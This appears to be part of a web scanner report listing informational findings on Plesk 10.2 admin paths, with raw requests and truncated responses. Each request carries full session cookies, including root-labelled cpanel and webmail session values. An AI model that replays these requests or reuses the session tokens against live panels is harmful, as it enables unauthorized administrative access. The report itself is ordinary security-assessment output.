Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:42:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:42:34 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:34 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/

Request

GET /admin/reseller/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:26:21 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:26:31 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:26:31 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/create  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/create

Request

GET /admin/reseller/create HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: Keep-Alive
Cookie: __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; PHPSESSID=539f3ab261e99e4b19efbd260df0b45d; locale=en-US; psaContext=home

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 18:55:34 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 18:55:35 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 18:55:35 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.43. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list

Request

GET /admin/reseller/list?context=resellers HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=customers

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:13:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:13:51 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:13:51 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list/

Request

GET /admin/reseller/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:25:57 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:26:06 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:26:07 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.45. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list/reset-search/

Request

GET /admin/reseller/list/reset-search/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:25:55 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:26:03 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:26:03 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.46. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/list/reset-search/true/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/list/reset-search/true/

Request

GET /admin/reseller/list/reset-search/true/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sun, 23 Oct 2011 19:19:16 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:19:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:19:17 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.47. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/login-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/login-info/

Request

GET /admin/reseller/login-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:33:08 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:33:19 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:33:19 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.48. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/personal-info/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/personal-info/

Request

GET /admin/reseller/personal-info/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:29:47 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:29:59 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:29:59 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/

Request

GET /admin/reseller/tools/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:26:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:26:45 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:26:45 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/id/

Request

GET /admin/reseller/tools/id/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:27:12 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:27:24 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:27:24 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/reseller/tools/id/3/

Request

GET /admin/reseller/tools/id/3/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:27:40 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:27:49 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:27:49 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/scripts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/scripts/

Request

GET /admin/scripts/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:42:33 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:42:33 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:42:34 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.53. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/

Request

GET /admin/server/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True

Response

HTTP/1.1 200 OK
Connection: close
Expires: Mon, 24 Oct 2011 14:39:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 14:39:56 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Sat, 24 Sep 2011 14:39:56 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

12.54. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settings  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/server/settings

Request

GET /admin/server/settings?context=settings HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=subscriptions

Response

HTTP/1.1 200 OK
Expires: Sun, 23 Oct 2011 19:13:51 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 23 Sep 2011 19:13:51 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Content-type: text/html
Date: Fri, 23 Sep 2011 19:13:51 GMT
Server: sw-cp-server
Content-Length: 1262


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
